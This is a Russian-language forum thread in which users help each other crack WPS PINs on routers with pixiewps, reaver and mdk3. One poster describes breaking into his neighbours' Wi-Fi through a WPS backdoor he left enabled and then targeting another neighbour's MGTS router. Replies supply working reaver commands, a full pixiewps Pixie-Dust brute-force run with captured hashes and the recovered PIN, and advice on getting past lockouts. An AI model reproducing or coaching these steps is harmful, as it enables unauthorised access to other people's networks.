кстати,кто пробовал в pixiewps поставить ключ -P .насобирать десяток разных хешей и потом их прогнать?просто неудобно эти хешы подставлять,долго......может автоматическое что то уже есть,не?
Доброе время суток, прошу помощи, интересует WPS PIN для роутера TOTOLINK N300RT 78:44:76:A3:96:3C. Был использован 07208287 | 24-bit PIN и pixiewps результат нулевой, какие еще возможны варианты?
И неудивительно, потому что вы не воспользовались генератором WPS PIN на сайте 3WiFi. Пробуйте 01042702 и 99956042.
Им и пользовался, только не те пины это понятно 99956042 | Static PIN - Onlime, а этого нет в Оффлайн генераторе 01042702? P.S.: понял 01042702 это Static PIN 01042702 90%
Доброй ночи, господа! Немного предыстории ) началось все с того что соседи сменили пороль от вай фая. Проблем особых не составило взломать их повторно, благо лазейку я себе оставил включив WPS. (благо не шарят). Что их понудило на это... пользовался ихней сетью в исключительно редких случаях. Ну ладно поехали дальше... Наткнулся я на очередного соседа с вкл WPS, роутер MGTS_GPON **** о думаю счастье привалило как бы не так, столкнулся с проблемой Меня смущает: [+] Trying pin 88885674. [+] 0.09% complete. гонял около 2 часов процесс и пин стоит на месте Сильно не ругайте я зеленый еще! скопировал минимум . подрузамеваю что роутер залочен как разлочить неужели рубильник ) ? Еще вопрос можно ли хеншейк прогнать по словарю на пин, а пин прогнать через ривер) ?
К дополнению, потестил на своем роутере MGTS_GPON **** интсрумент mdk3, к сожалению нужно находиться в непосредственной близостик к роутеру из за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя( обидно . После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! помогите) я так близко)
Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные. Именно. Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять. Если пароль будет найден, уже нет смысла прогонять пин. Внешние адаптеры с антеннами наше всё.
СПУСТИл НА ЗЕМЛЮ( А с этим то как быть, После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! неужели постоянно ребут,получается взлом гадского мгтс становится невыпонимым!?
Если pixiewps не находит пин код сразу, то: 1. Попробовать ещё пару раз 2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой) 3. Словить хендшейк, скинуть в тему подбора Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.
Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило. И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?
Так я и думал. В общем, пробуйте вот так (когда точка разлочится): reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1 И номер канала точки укажите вместо решётки.
jr ок сейчас попробую отпишу. пока эксперементию на своей точке с ребутом проблем нет все упирается в количество попыток , а их всего 10( Я ПРАВИЛЬНО ПОНИМАЮ PIXIEWPS -K 1 не поможет уязвимости нет!? Попробывал еще так : [/quote]
Этот роутер уязвим к атаке "Pixie-Dust". Полученных данных достаточно для получения корректного ПИНа, надо вручную запустить pixiewps с параметром -f (full PRNG brute force): Spoiler: pixiewps -f Code: root@linux:~$ pixiewps -f -e c6:dd:34:30:b5:83:e8:59:9b:a8:aa:45:f0:42:8a:6d:21:e7:d1:e9:65:33:4b:b0:9e:98:7c:ff:67:36:d6:4b:09:06:b7:48:8f:80:48:01:b7:7c:a1:57:89:21:d4:a9:58:af:ce:34:4c:38:4c:4f:78:9e:6a:f4:17:1e:c1:b0:0a:3d:44:e5:a7:54:f0:e6:b4:42:58:eb:a0:cb:9d:64:53:01:fd:20:70:1a:ff:2f:58:8e:62:79:f6:95:e5:3c:28:19:e6:15:86:50:4e:91:15:2b:47:83:f9:b4:48:4c:67:d7:b2:90:df:20:e3:07:fc:83:53:29:4d:f4:36:6b:4d:68:a5:3a:ae:d5:f9:a5:57:18:a5:7b:e6:23:8d:f3:af:f7:c2:ff:15:ed:9d:76:aa:e7:76:cc:3c:85:dc:47:b6:09:7b:e3:7d:8f:d9:b0:dd:f1:36:df:dd:b4:ce:d4:c0:bc:39:b7:22:9b:cb:d2:79:40:66:98:72:95:32:b6 -r c5:14:14:4f:e1:df:0b:1c:e1:49:a3:22:ad:8f:88:64:7a:73:0b:05:59:c0:a7:ee:10:9c:d3:9c:93:6b:73:42:e1:50:93:4e:1f:f3:15:8c:13:58:02:72:9d:c1:3b:45:82:44:7b:0e:59:28:50:34:bd:12:e3:5f:ba:a5:34:57:b5:49:9b:c4:08:09:ab:29:11:81:0e:cb:55:8e:82:ab:fe:26:4b:88:aa:4e:67:24:fc:4b:ae:f0:87:4a:87:b8:db:1c:a4:d4:a3:c6:91:d2:0c:c6:22:9e:d2:7b:1b:97:1f:dc:88:0b:71:3c:d9:c5:67:fd:59:b6:cd:fc:4a:a9:80:8d:56:d6:1e:c0:d4:36:dd:c1:a7:52:60:17:f4:8d:49:cb:28:5d:4b:b8:46:59:4e:af:3d:09:c3:ae:c4:bb:69:70:f3:7f:5b:cc:f5:2b:8b:09:dd:30:7c:5a:21:f7:54:72:63:40:f4:57:98:d1:a6:f1:4f:01:cd:4b:75:d8 -s 9e:c6:5c:68:11:24:dc:f0:79:12:ca:10:17:5d:93:f8:12:41:74:ba:23:e8:49:95:67:26:1b:16:aa:69:51:92 -z 9c:d6:82:f1:3a:32:e8:1b:e3:9d:28:bb:08:db:85:ee:83:a0:bf:b7:ed:10:98:69:6b:6e:b4:64:02:78:19:68 -a 79:d6:07:86:98:84:51:82:2a:db:3f:5f:3b:e5:39:1a:32:65:c0:28:a2:e5:90:31:fc:43:65:5d:c4:ce:20:ca -n 41:5a:94:dc:43:2e:de:0d:31:fb:c1:53:59:47:2a:ac Pixiewps 1.2 [*] PRNG Seed: 1482612324 (Sat Dec 24 20:45:24 2016 UTC) [*] Mode: 3 (RTL819x) [*] PSK1: e6:b3:49:20:6e:d2:67:f2:7c:1d:87:83:1c:8d:a9:9e [*] PSK2: 70:3c:c5:ef:02:d0:15:1d:46:d7:07:4f:ae:1a:a0:8e [*] E-S1: 6f:85:64:b9:38:17:11:f0:58:e3:95:5d:02:9c:a3:d0 [*] E-S2: 6f:85:64:b9:38:17:11:f0:58:e3:95:5d:02:9c:a3:d0 [+] WPS pin: 21459221 [*] Time taken: 0 s 122 ms А далее запустить: reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv -p 21459221 для получения пароля. Обнови pixiewps.
ВАУ ТЫ ГЕНИЙ))) ! ПИН ТАКОЙЖЕ КАК И В НАСТРОЙКАХ РОУТЕРА КРУТЯК! держись МГТС Я ИДУ ЗА ТОБОЙ) Спасибо тебе за новодку я не знал что существуют модификации, всегда обновляюсь.Кстати после обновления Pixiewps почему в аргументах нету инфы по этому инструменту -f
